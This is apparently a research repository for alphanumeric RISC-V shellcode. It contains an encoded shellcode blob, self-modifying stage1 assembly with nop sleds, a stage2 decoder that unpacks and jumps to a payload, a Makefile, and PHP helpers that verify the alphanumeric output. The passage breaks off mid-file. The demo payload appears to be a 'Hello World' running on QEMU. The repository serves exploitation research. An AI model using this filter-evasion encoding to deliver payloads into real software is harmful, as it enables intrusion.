BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCGEDEDDDOEEDEEDDGEEEECEDGEEDEDLAKJDDDBDDEDDNCMCDDDDDGMCLCFFDCOBGEDDEGDCHCDDDALCDLMFHGDCHCDDDACOKEDAPFLDLDDDDDDDDLPABHBHBKBHFDFCCKBFCHBbPEFNDDDDDBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB3Y0A3Q/ABj/8Aa/8Aa1J3RHA3Z0A/0Ac/8AD//Aa/2AA9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a9a3Z0A/0Ac/8AD75/AIJ3SEA131313//aDAa3Z0A/0Ac/8AD75xW1J3SEAi3//aDAa3Z0A/0Ac/8AD7EqY1J3SEAY3//aDAa3Z0A/0Ac/8AD7EpQ9J3ZEA//AAAa3Z0A/0Ac/8AD75gA9J3SEAy3//aDAa3Z0A/0Ac/8AD7ETX1J3SEAY3//aDAa3Z0A/0Ac/8AD7ElX1J3SEAY3//aDAa3Z0A/0Ac/8AD75PP9J3ZEA//AAAa3Z0A/0Ac/8AD7/zX1I3Z/A//AAAa3Z0A/0Ac/8AD75r05J3ZEA//AAAa3Z0A/0Ac/8AD7EBA9J3ZEA//AAAa3Z0A/0Ac/8AD7/F/1Im93S/Au3//aDAa3Z0A/0Ac/8AD7Ea85J3SEAY3//aDAa3Z0A/0Ac/8AD7UpP1J3ZEA//AAAa3Z0A/0Ac/8AD75aQ1J3SEAY3A3//aDAa3Z0A/0Ac/8AD7///1Ia93S/AY3M31313//aDAa3Z0A/0Ac/8AD75/AIJ3SEA131313//aDAa3Z0A/0Ac/8AD7/h91I3Z/A//AAAaySySySySySySySs0A4


--------------------------------------------------------------------------------
/baremetal/slash/stage1.S:
--------------------------------------------------------------------------------
 1 | /*#
 2 |  *# (c) 2018-2019 Hadrien Barral
 3 |  *# SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | include(`../scripts/common.m4')#'
 7 | 
 8 | #define XP sp
 9 | .macro dangerous_nop2
10 |     li     t1,-2
11 | .endm
12 | 
13 | #ifndef COMPUTE_XP_FIXUP
14 | /*# Defines 'xp_fixup' and 'end_nopsled' */
15 | #include "xp_fixup.S"
16 | #endif
17 | 
18 | .global _start
19 | _start:
20 | step0:
21 |     repeat(2, {dangerous_nop2}) /*# Make sure sp will be aligned on 8 */
22 |     .word 0x2F302F6F /*# This is the minimal 'jal reg, step1' */
23 | 
24 | load_values:
25 |     .dword 0x4A33304242424242
26 |     .dword 0x4242424242424242
27 |     .dword 0x4A43504242424242
28 | payload_pool:
29 |     repeat(5484, {.half 0x4242})
30 | 
31 | step1: /*# Move 'link' register to XP */
32 |     sra      s2, zero, s3 /*# s2 := 0 */
33 |     sra      XP, t5, s2 /*# XP := t5 */
34 | 
35 | step2: /*# Load the majic step4 upper-word value (0xA031) */
36 |     ld       s4, 16(XP)
37 |     amoand.d a6, s4, (XP)
38 |     amoand.d a6, s4, (XP)
39 |     li       s4, 12
40 |     sra      tp, a6, s4 /*# tp now contain the majic upper value */
41 | 
42 |     sra         s4, zero, s3   /*# s4 := 0 */
43 |     amoand.d.rl zero, s4, (XP) /*# Zero one (now useless) load value */
44 |     amoor.d.aq  a6, tp, (XP)   /*# Set the majic value */
45 |     amoand.w    t5, s4, (XP)   /*# Zero the lower word */
46 |     amoor.d     tp, s4, (XP)   /*# tp now contain the majic value */
47 | 
48 | step3: /*# Fixup XP (Need to have 'XP == step6') */
49 |     #ifndef COMPUTE_XP_FIXUP
50 |     xp_fixup
51 |     #endif
52 | 
53 | step4: /*# Write stage2 */
54 | .macro init_block
55 |     sra         s4, zero, s3   /*# s4 := 0 */
56 |     amoand.d.rl zero, s4, (XP) /*# Zero the word */
57 |     amoor.d.aq  a6, tp, (XP)   /*# Set the majic word value */
58 |     /*# We now need to set the lower word (easier said than done) */
59 | .endm
60 | .macro next_block
61 |     /*# 'addi XP,XP,16', but gas chooses another non-alnum encoding */
62 |     .short 0x6141
63 | .endm
64 | #include "stage2_encoded.S"
65 | 
66 | step5: /*# Nopsled to make up for loose ends. */
67 |     #ifndef COMPUTE_XP_FIXUP
68 |     end_nopsled
69 |     #endif
70 | 
71 | step6: /*# Stage 2 will be decoded here */
72 |     csrc  mip,sp
73 | .global end
74 | end:
75 | 


--------------------------------------------------------------------------------
/baremetal/slash/stage1.ld:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | ENTRY (_start)
 7 | 
 8 | SECTIONS
 9 | {
10 |     . = 0x80000000;
11 |     .text . : SUBALIGN(4096) { *(.text) }
12 |     .data : { *(.data) }
13 | }
14 | 


--------------------------------------------------------------------------------
/baremetal/slash/stage2.S:
--------------------------------------------------------------------------------
 1 | /*#
 2 |  *# (c) 2018-2019 Hadrien Barral
 3 |  *# SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | .macro filler4
 7 |     .word  0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF
 8 | .endm
 9 | .macro filler2
10 |     .half  0xFFFF
11 |     filler4
12 | .endm
13 | 
14 | /*# Allowed registers: s0;a0-a5 (also s1 in specific cases) */
15 | #define XA s0
16 | #define XB a5
17 | #define XP a0
18 | #define XQ a4
19 | #define XS a1
20 | #define XJ a3
21 | 
22 |     fence.i
23 |                         filler4
24 |     lui  XQ, 0xfffff    /*# Negative offset to get back somewhere in pool */
25 |                         /*#  'insert' needs to sync with this */
26 |                         filler2
27 |     add  XQ, XQ, sp     /*# Start addr to store to */
28 |                         filler2
29 |     li   XS, 0x10
30 |                         filler2
31 |     slli XS, XS, 6      /*# Size to decode (XS == 0x400) */
32 |                         filler2
33 |     mv   XP, XQ         /*# Start addr to load from */
34 |                         filler2
35 |     mv   XJ, XQ         /*# Where to jump */
36 |                         filler2
37 | /*# Decoding loop. See paper for explanation */
38 | next:
39 |     lw   XA, 4(XP)
40 |                         filler2
41 |     mv   XB, XA
42 |                         filler2
43 |     srli XB, XB, 4
44 |                         filler2
45 |     addi XP, XP, 2
46 |                         filler2
47 |     xor  XA, XA, XB
48 |                         filler2
49 |     sw   XA, 0(XQ)
50 |                         filler2
51 |     addi XQ, XQ, 1
52 |                         filler2
53 |     addi XS, XS, -2
54 |                         filler2
55 |     bnez XS, next
56 |                         filler2
57 | done:
58 |     fence.i
59 |                         filler4
60 |     jalr XJ
61 |                         filler2
62 | 


--------------------------------------------------------------------------------
/baremetal/tick/.gdbinit:
--------------------------------------------------------------------------------
1 | target remote :1235
2 | layout next
3 | layout next
4 | layout next
5 | layout next
6 | layout next
7 | set riscv use_compressed_breakpoints no
8 | 


--------------------------------------------------------------------------------
/baremetal/tick/.gitignore:
--------------------------------------------------------------------------------
1 | build
2 | 


--------------------------------------------------------------------------------
/baremetal/tick/Makefile:
--------------------------------------------------------------------------------
 1 | #
 2 | # (c) 2018-2019 Hadrien Barral
 3 | # SPDX-License-Identifier: Apache-2.0
 4 | #
 5 | 
 6 | RV_ABI    := rv64gc
 7 | include ../scripts/common.mk
 8 | NAME      := shellcode
 9 | PAYD      := payload_serial
10 | 
11 | all: $(NAME).bin
12 | 
13 | $(BUILD):
14 | 	$(Q)mkdir -p $@
15 | 
16 | $(BUILD)/stage1_nofixup.o: stage1.S | $(BUILD)
17 | 	$(Q)m4 -I $(BUILD) $< > $(BUILD)/$<.m4.S
18 | 	$(Q)$(GCC) -DCOMPUTE_XP_FIXUP -o $(BUILD)/$<.i -P -E $(BUILD)/$<.m4.S
19 | 	$(Q)$(AS) $(ASFLAGS)   -o $@ -c $(BUILD)/$<.i
20 | 
21 | $(BUILD)/xp_fixup.S: $(BUILD)/stage1_nofixup.o compute_fixup.php
22 | 	$(Q)$(OBJDUMP) -x $< | grep step6 | awk '{print $$1}' > $@.step6_value
23 | 	$(Q)php $(word 2,$^) -i $@.step6_value -o $@
24 | 
25 | $(BUILD)/stage1.o: stage1.S $(BUILD)/xp_fixup.S
26 | 	$(Q)m4 -I $(BUILD) $< > $(BUILD)/$<.m4.S
27 | 	$(Q)$(GCC) -o $(BUILD)/$<.i -P -E $(BUILD)/$<.m4.S
28 | 	$(Q)$(AS) $(ASFLAGS)   -o $@ -c $(BUILD)/$<.i
29 | 
30 | $(BUILD)/stage1.elf: $(BUILD)/stage1.o stage1.ld
31 | 	$(Q)$(LD) $(LDFLAGS) -T $(word 2,$^) -o $@ $<
32 | 
33 | $(BUILD)/stage1.bin: $(BUILD)/stage1.elf
34 | 	$(Q)$(OBJCOPY) -O binary $< $@
35 | 
36 | $(BUILD)/$(NAME).bin.nocheck: $(BUILD)/stage1.bin $(BUILD)/$(PAYD).bin \
37 |                               $(BUILD)/stage1.o insert.php stage1.S
38 | 	$(Q)$(OBJDUMP) -x $(word 3,$^) | grep step6 | awk '{print $$1}' > $@.step6_value
39 | 	$(Q)grep "^\s*next_block$$" $(word 5,$^) | wc -l > $@.stage2_value
40 | 	$(Q)php $(word 4,$^) -i $< -p $(word 2,$^) -v $@.step6_value -t $@.stage2_value -o $@
41 | 
42 | $(NAME).bin: $(BUILD)/$(NAME).bin.nocheck check.php
43 | 	$(Q)php $(word 2,$^) -i $< -c "A-Za-z0-9\'"
44 | 	$(Q)cp $< $@
45 | 
46 | $(BUILD)/stage2.o: stage2.S | $(BUILD)
47 | 	$(Q)$(GCC) -o $(BUILD)/$<.i -P -E $<
48 | 	$(Q)$(AS) $(ASFLAGS)   -o $@ $(BUILD)/$<.i
49 | 
50 | $(BUILD)/stage2.bin: $(BUILD)/stage2.o
51 | 	$(Q)$(OBJCOPY) -O binary $< $@
52 | 
53 | $(BUILD)/loadgen: loadgen.cpp
54 | 	$(Q)g++ -O3 -std=gnu++17 -march=native -ffp-contract=on -Wall -Wextra -Wconversion $< -o $@
55 | 
56 | include ../payload/payload.mk
57 | $(eval $(call build_payload,$(PAYD),0x8000800580,$(BUILD)/$(PAYD).bin))
58 | 
59 | clean:
60 | 	$(Q)rm -rf $(BUILD) $(NAME).bin
61 | 


--------------------------------------------------------------------------------
/baremetal/tick/README.txt:
--------------------------------------------------------------------------------
1 | This folder contains the 'Hello World' 'RV64IDC demo on QEMU.
2 | 


--------------------------------------------------------------------------------
/baremetal/tick/check.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | 	$args = getopt('i:c:');
 9 | 
10 | 	$f = file_get_contents($args['i']);
11 | 
12 | 	/* Ignore gadget */
13 | 	for($i=0; $i<6; $i++) {
14 | 		$f[$i] = "a";
15 | 	}
16 | 
17 | 	$regex = "/[".$args['c']."]/";
18 | 
19 | 	/* For debug */
20 | 	function not_alnum_verbose(&$f, $regex) {
21 | 		$len = strlen($f);
22 | 		for ($i=0; $i<$len; $i++) {
23 | 			$c = $f[$i];
24 | 			if (preg_replace($regex, '', $c) !== '') {
25 | 				printf("Not alnum (0x%x)!\n", $i);
26 | 				return;
27 | 			}
28 | 		}
29 | 	}
30 | 
31 | 	if (preg_replace($regex, '', $f) !== '') {
32 | 		not_alnum_verbose($f, $regex);
33 | 		//exit(0); /* For dev */
34 | 		exit(1);
35 | 	}
36 | ?>


--------------------------------------------------------------------------------
/baremetal/tick/compute_fixup.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | $args = getopt('i:o:');
 9 | 
10 | $f = file_get_contents($args['i']);
11 | 
12 | $step6_offset = intval($f, 16);
13 | $xp_init_value = 6+4+1952; /* Sync with 'jal step1' + store offset */
14 | if($step6_offset < $xp_init_value) {
15 | 	die("Oops. Please improve the algorithm (1).");
16 | }
17 | $xp_offset = $step6_offset - $xp_init_value;
18 | $addi_cost = 2;
19 | $sp_ops = [112,-112,144,-144,16,-160,176,-176,-192,208,-208,240,-240,
20 |            272,-272,304,-304,320,336,-336,352,368,-368,400,-400,-432,
21 | 		   448,464,-464,48,-48,-496,-64,80];
22 | 
23 | foreach($sp_ops as &$e) {
24 | /* Negative weights are difficult to handle.
25 |    Here, they would not make the optimal better than more than a single instruction.
26 |    (because [1-29] can be made by at most the sum of 2 values)
27 |    Let us drop them. */
28 | 	if($e < 0) {
29 | 		unset($sp_ops[$e]);
30 | 	} else {
31 | 		$e -= 2; /* Remove the cost from the instruction itself */
32 | 	}
33 | }
34 | sort($sp_ops);
35 | /* We now have 1,3,5,7,9,11,13,15,17,19,20,21,22,23,25,28,29 */
36 | 
37 | /* We need quite a lot of 464, and we have 448 available.
38 |  * Thus we simply need to compute an upper bound with 464,
39 |  * then switch some of the 464 to 448 to get down at close
40 |  * as possible to the target.
41 |  */
42 | 
43 | $v464 = 464-$addi_cost;
44 | $v448 = 448-$addi_cost;
45 | 
46 | if($xp_offset == 0) {
47 | 	die("Oops. Please improve the algorithm (2).");
48 | }
49 | 
50 | $n464 = ceil($xp_offset / $v464); /* quotient */
51 | $r464 = $v464 - ($xp_offset % $v464); /* remainder */
52 | $n448 = floor($r464 / ($v464-$v448));
53 | 
54 | $n464 -= $n448;
